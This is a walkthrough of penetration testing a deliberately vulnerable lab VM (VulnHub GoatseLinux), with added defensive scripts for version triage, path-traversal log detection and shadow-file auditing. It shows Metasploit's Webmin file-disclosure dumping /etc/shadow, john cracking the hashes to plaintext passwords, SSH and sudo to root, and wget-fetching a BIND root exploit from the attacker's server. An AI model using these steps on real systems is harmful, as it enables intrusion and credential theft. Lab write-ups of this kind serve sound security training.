VulnHub target machine penetration [GoatseLinux-1]

Name: GoatseLinux:1
Release date: 27 June 2009

Download:

  • Download: http://neutronstar.org/tmp/GoatseLinux_1.0_VM.rar
  • Download (Mirror): https://download.vulnhub.com/goatselinux/GoatseLinux_1.0_VM.rar
  • Download (Torrent): https://download.vulnhub.com/goatselinux/GoatseLinux_1.0_VM.rar.torrent

Description:

GoatseLinux v1.0 Pentest Lab VM
Steve Pordon
2009.06.27
Distributed widely under the GNU license.
This was built specifically for VMware 6.5 compatibility.
WARNING: GoatseLinux is insecure. It is designed as a lab toolbox for practising penetration testing. Since almost every program installed on it is wide open, it is strongly recommended that you do not set the VM's networking to anything other than "host-only", unless you enjoy having your VM used as a spam zombie.
Notes:
Built on Slax 5.0.7.
Source: readme.txt

Information gathering

nmap, at your service

root@kali:~# nmap -sn -v 192.168.142.0/24
Nmap scan report for 192.168.142.132
Host is up (0.00015s latency).
MAC Address: 00:0C:29:0A:54:68 (VMware)
root@kali:~# nmap -sV -Pn -p- -v 192.168.142.132
PORT STATE SERVICE VERSION
21/tcp open ftp
22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)
25/tcp open smtp Sendmail
53/tcp open domain ISC BIND 8.2.2-REL
80/tcp open http Apache httpd 1.3.31 ((Unix))
587/tcp open smtp Sendmail
631/tcp open ipp CUPS 1.1
3306/tcp open mysql MySQL (unauthorized)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
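The scan above is mostly a list of software that was already end-of-life when this VM was built (OpenSSH 3.5 still speaking protocol 1, Apache 1.3, BIND 8, CUPS 1.1, Webmin on a routable port). The following script is an added example, not part of the original write-up or of Metasploit/nmap: it parses nmap's PORT/STATE/SERVICE/VERSION table and flags every service that falls below a patch baseline. The baseline versions in MIN_SUPPORTED and the list of administrative products are assumed policy values chosen for the example, not facts from the page.

```python
import re

# The service table printed by nmap -sV above, embedded as constructed input.
SCAN_OUTPUT = """\
21/tcp open ftp
22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)
25/tcp open smtp Sendmail
53/tcp open domain ISC BIND 8.2.2-REL
80/tcp open http Apache httpd 1.3.31 ((Unix))
587/tcp open smtp Sendmail
631/tcp open ipp CUPS 1.1
3306/tcp open mysql MySQL (unauthorized)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
"""

# Assumed baseline: the oldest major.minor release line still accepted for each
# product. These are policy values chosen for this example; adjust to your own.
MIN_SUPPORTED = {
    "OpenSSH": (7, 0),
    "Apache httpd": (2, 4),
    "ISC BIND": (9, 16),
    "CUPS": (2, 0),
}

# Administrative interfaces that should not be reachable from a general network.
ADMIN_PRODUCTS = ("Webmin",)

LINE_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)


def parse_version(text):
    """Extract the leading major.minor pair from a version string, e.g. '3.5p1' -> (3, 5)."""
    m = re.search(r"(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def parse_scan(text):
    """Turn nmap's PORT/STATE/SERVICE/VERSION lines into dicts; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["version"] = row["version"] or ""
            rows.append(row)
    return rows


def triage(text):
    """Return sorted (port, reason) findings for services below the baseline or otherwise risky."""
    findings = []
    for row in parse_scan(text):
        port, version = int(row["port"]), row["version"]
        for product, floor in MIN_SUPPORTED.items():
            if version.startswith(product):
                ver = parse_version(version[len(product):])
                if ver and ver < floor:
                    findings.append((port, f"{product} {ver[0]}.{ver[1]} is below the {floor[0]}.{floor[1]} baseline"))
        # 'protocol 1.99' means the SSH server still negotiates the obsolete protocol 1.
        if re.search(r"protocol 1\.", version):
            findings.append((port, "SSH protocol 1 enabled"))
        if any(p in version for p in ADMIN_PRODUCTS):
            findings.append((port, "administrative web interface exposed"))
    return sorted(findings)


if __name__ == "__main__":
    for port, reason in triage(SCAN_OUTPUT):
        print(f"{port:>6}  {reason}")
```

Run against the table above it reports ports 22 (twice: old version and protocol 1), 53, 80, 631 and 10000; the FTP and Sendmail lines carry no version and so are not judged, which is itself a gap worth closing with `nmap --script banner` or a manual check.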

Found:

http://192.168.142.132/

http://192.168.142.132/goatse.html

http://192.168.142.132:10000/

Port 10000 is Webmin, the web-based system administration tool. Metasploit provides three modules for it: one exploit that yields a shell, and two auxiliary modules that retrieve arbitrary files.
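From the defender's side, the file-disclosure module's requests leave traces in the web server's access log: paths that, once decoded, walk out of the document root with `..` segments. The script below is an added example, not code from the write-up or from Webmin/Metasploit; it is a generic path-traversal detector that repeatedly URL-decodes each requested path (to catch double encoding), discards control characters, and then looks for a literal `..` path segment. The log lines are constructed for the example in Apache combined format and do not reproduce the module's actual request.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format); the request paths are
# illustrative and not copied from a real capture.
LOG_LINES = [
    '192.168.142.128 - - [18/Dec/2019:21:10:01 +0000] "GET / HTTP/1.1" 200 1432',
    '192.168.142.128 - - [18/Dec/2019:21:10:05 +0000] "GET /unauthenticated/..%2f..%2fetc/passwd HTTP/1.1" 200 1098',
    '192.168.142.128 - - [18/Dec/2019:21:10:09 +0000] "GET /unauthenticated/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 200 1301',
    '192.168.142.10 - - [18/Dec/2019:21:11:00 +0000] "GET /session_login.cgi HTTP/1.1" 200 2310',
    '192.168.142.10 - - [18/Dec/2019:21:11:03 +0000] "GET /images/..png HTTP/1.1" 404 210',
]

REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise(path):
    """Decode until stable (defeats double encoding), drop control bytes, unify separators."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    path = "".join(ch for ch in path if ch >= " ")
    return path.replace("\\", "/")


def is_traversal(path):
    """True when any path segment (query string excluded) is exactly '..'."""
    segments = normalise(path).split("?", 1)[0].split("/")
    return ".." in segments


def scan_log(lines):
    """Return one hit per traversal request, noting whether the server served it (HTTP 200)."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        if is_traversal(m["path"]):
            hits.append({
                "ip": m["ip"],
                "path": m["path"],
                "status": int(m["status"]),
                "served": m["status"] == "200",
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        flag = "SERVED" if hit["served"] else "blocked"
        print(f"{hit['ip']:<16} {flag:<8} {hit['path']}")
```

A hit with `served` set is the one to escalate: the server answered 200 to a request that should never have matched a file. The benign `/images/..png` line does not trigger because `..png` is not a `..` segment, which is why matching on decoded segments is preferable to searching for the two characters anywhere in the line.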

msf, at your service

root@kali:~# msfdb run
[+] Starting database

___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'



=[ metasploit v5.0.64-dev ]
+ -- --=[ 1952 exploits - 1092 auxiliary - 335 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

msf5 > use auxiliary/admin/webmin/file_disclosure
msf5 auxiliary(admin/webmin/file_disclosure) > set RHOST 192.168.142.132
RHOST => 192.168.142.132
msf5 auxiliary(admin/webmin/file_disclosure) > exploit
[*] Running module against 192.168.142.132

[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/var/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
guest:x:1000:100::/home/guest:/bin/bash
goatse:x:1002:10:,,,:/home/goatse:/bin/bash
jpelman:x:1003:100:,,,:/home/jpelman:/bin/bash
jblow:x:1004:100:,,,:/home/jblow:/bin/bash
[*] Auxiliary module execution completed
msf5 auxiliary(admin/webmin/file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf5 auxiliary(admin/webmin/file_disclosure) > exploit
[*] Running module against 192.168.142.132

[*] Attempting to retrieve /etc/shadow...
[*] The server returned: 200 Document follows
root:$1$k6V/lmUF$n2iBfemYg/IsVRyjqopr3.:14422:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
guest:$1$T7.0qXyH$hC4dje14rIUFJXbZUCkdB/:12876:0:99999:7:::
goatse:$1$lXWz2SF8$sr5ux2i3UpMAf30t5uMtT0:14422:0:99999:7:::
jpelman:$1$3nO0QVVF$Iy21QTWTrHPd5/6ZrAvrj.:14422:0:99999:7:::
jblow:$1$35A0vqVF$MoYgZm/DxNS5nBZZk3Y2R1:14422:0:99999:7:::
[*] Auxiliary module execution completed

Save /etc/shadow to a .txt file and crack the password hashes with john; in john's output the password is on the left and the username on the right.

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt /root/goastshadow
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bobby (jpelman)
kokomo (jblow)
guest (guest)
gaping (goatse)
4g 0:00:00:49 DONE (2019-12-18 21:35) 0.08014g/s 282509p/s 320894c/s 320894C/s !!!0mc3t..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed
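All five hashes fell in 49 seconds because they are md5crypt (`$1$`), a scheme with a fixed 1000-round MD5 loop that john above computed at roughly 320k crypts per second on four threads. The audit script below is an added example, not part of the write-up or of john, and it illustrates both the shadow dump and the cracking result: it joins the /etc/passwd and /etc/shadow excerpts retrieved above, skips locked accounts, and reports every account whose password is actually usable together with its hash scheme, the date the password was last changed, and whether it ever expires. The maximum-age threshold and the set of no-login shells are assumptions made for the example.

```python
import datetime

# Excerpts of the /etc/passwd and /etc/shadow retrieved above, embedded as constructed
# input (the service accounts with a '*' password are trimmed to a few representatives).
PASSWD = """\
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
guest:x:1000:100::/home/guest:/bin/bash
goatse:x:1002:10:,,,:/home/goatse:/bin/bash
jpelman:x:1003:100:,,,:/home/jpelman:/bin/bash
jblow:x:1004:100:,,,:/home/jblow:/bin/bash
"""

SHADOW = """\
root:$1$k6V/lmUF$n2iBfemYg/IsVRyjqopr3.:14422:0:::::
bin:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
guest:$1$T7.0qXyH$hC4dje14rIUFJXbZUCkdB/:12876:0:99999:7:::
goatse:$1$lXWz2SF8$sr5ux2i3UpMAf30t5uMtT0:14422:0:99999:7:::
jpelman:$1$3nO0QVVF$Iy21QTWTrHPd5/6ZrAvrj.:14422:0:99999:7:::
jblow:$1$35A0vqVF$MoYgZm/DxNS5nBZZk3Y2R1:14422:0:99999:7:::
"""

# crypt(3) prefixes and the schemes they denote.
HASH_SCHEMES = {"$1$": "md5crypt", "$2": "bcrypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
WEAK_SCHEMES = {"md5crypt"}          # fixed, low work factor: wordlist-crackable in seconds
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}  # assumed list
EPOCH = datetime.date(1970, 1, 1)
MAX_AGE_DAYS = 365                   # assumed policy: anything longer counts as "never expires"


def scheme_of(hash_field):
    """Classify the shadow password field: empty, locked ('*' or '!...'), a known scheme, or unknown."""
    if hash_field == "":
        return "empty"
    if hash_field[0] in "*!":
        return "locked"
    for prefix, name in HASH_SCHEMES.items():
        if hash_field.startswith(prefix):
            return name
    return "unknown"


def parse_passwd(text):
    """Map user -> login shell; an empty shell field means /bin/sh per passwd(5)."""
    shells = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) >= 7:
            shells[f[0]] = f[6] or "/bin/sh"
    return shells


def audit(passwd_text, shadow_text):
    """Return per-user findings for every account whose password could actually be used."""
    shells = parse_passwd(passwd_text)
    report = {}
    for line in shadow_text.splitlines():
        f = line.split(":")
        if len(f) < 5:
            continue
        user, pw, last, maxage = f[0], f[1], f[2], f[4]
        scheme = scheme_of(pw)
        if scheme == "locked":
            continue  # nothing to crack and nothing to log in with
        issues = []
        if scheme == "empty":
            issues.append("empty password")
        elif scheme in WEAK_SCHEMES:
            issues.append(f"weak hash scheme {scheme}")
        if not maxage.isdigit() or int(maxage) > MAX_AGE_DAYS:
            issues.append("password never expires")
        shell = shells.get(user, "")
        if shell and shell not in NOLOGIN_SHELLS:
            issues.append(f"interactive shell {shell}")
        report[user] = {
            "scheme": scheme,
            "last_changed": EPOCH + datetime.timedelta(days=int(last)) if last.isdigit() else None,
            "issues": issues,
        }
    return report


if __name__ == "__main__":
    for user, info in audit(PASSWD, SHADOW).items():
        print(f"{user:<10} {info['scheme']:<12} changed {info['last_changed']}  {'; '.join(info['issues'])}")
```

The `last_changed` field decodes the third shadow column (days since 1970-01-01): 14422 is 2009-06-27, the day the VM was released, so four of the five passwords had never been changed after installation, and the empty or 99999 maximum-age fields mean they never would be.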

Log in as one of the cracked users, goatse

root@kali:~# ssh goatse@192.168.142.132
The authenticity of host '192.168.142.132 (192.168.142.132)' can't be established.
RSA key fingerprint is SHA256:25uPigwKnzugpFkHd91FCdBukcikll8dkH4oV7OQROY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.142.132' (RSA) to the list of known hosts.
goatse@192.168.142.132's password:
Linux 2.6.15.
goatse@slax:~$ id
uid=1002(goatse) gid=10(wheel) groups=10(wheel)
goatse@slax:~$ whoami
goatse
goatse@slax:~$ pwd
/home/goatse
goatse@slax:~$

Privilege escalation 1

goatse@slax:~$ uname -a
Linux slax 2.6.15 #1 SMP Tue Jan 10 07:53:57 GMT 2006 i686 unknown unknown GNU/Linux
goatse@slax:~$ sudo -s
Password:
root@slax:~# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
root@slax:~# whoami
root

Privilege escalation 2

Another approach goes through the old kernel: the prctl privilege-escalation vulnerability.
Exploit download: BIND

Kali side

root@kali:~# python -m SimpleHTTPServer

Shell side

goatse@slax:~$ wget http://192.168.142.128:8000/282.c
--20:16:25-- http://192.168.142.128:8000/282.c
=> `282.c'
Connecting to 192.168.142.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,429 (16K) [text/plain]

100%[===========================================================>] 16,429 --.--K/s

20:16:25 (290.15 MB/s) - `282.c' saved [16429/16429]

Compile and run

goatse@slax:~$ gcc 282.c -o bind
282.c:565:28: warning: no newline at end of file
goatse@slax:~$ ls
282.c* bind* test.sh*
goatse@slax:~$ ./bind 127.0.0.1
[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix
[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net

[*] attacking 127.0.0.1 (127.0.0.1)
[d] HEADER is 12 long
[d] infoleak_qry was 476 long
[*] iquery resp len = 719
[d] argevdisp1 = 080d7cd0, argevdisp2 = b7daea64
[*] retrieved stack offset = bfc2a8f8
[d] evil_query(buff, bfc2a8f8)
[d] shellcode is 134 long
[d] olb = 248
[x] could not write our data in buffer (offset0=56, rroffsetidx=4)
[x] error sending tsig packet

For some reason it kept failing. There is also a root exploit for this SSH version, a privilege escalation in Apache, and several remote shell vulnerabilities in CUPS. This is a playground of old vulnerabilities. Metasploitable (and Metasploitable 2) has more vulnerable services; if you are looking for that kind of playground, the ones on Goatsie are recommended.

Game over

Sorry, this time I still couldn't find that Greek expert's foolproof one-click completion script. I am so sorry about this... It's a pity...

The end, to be continued...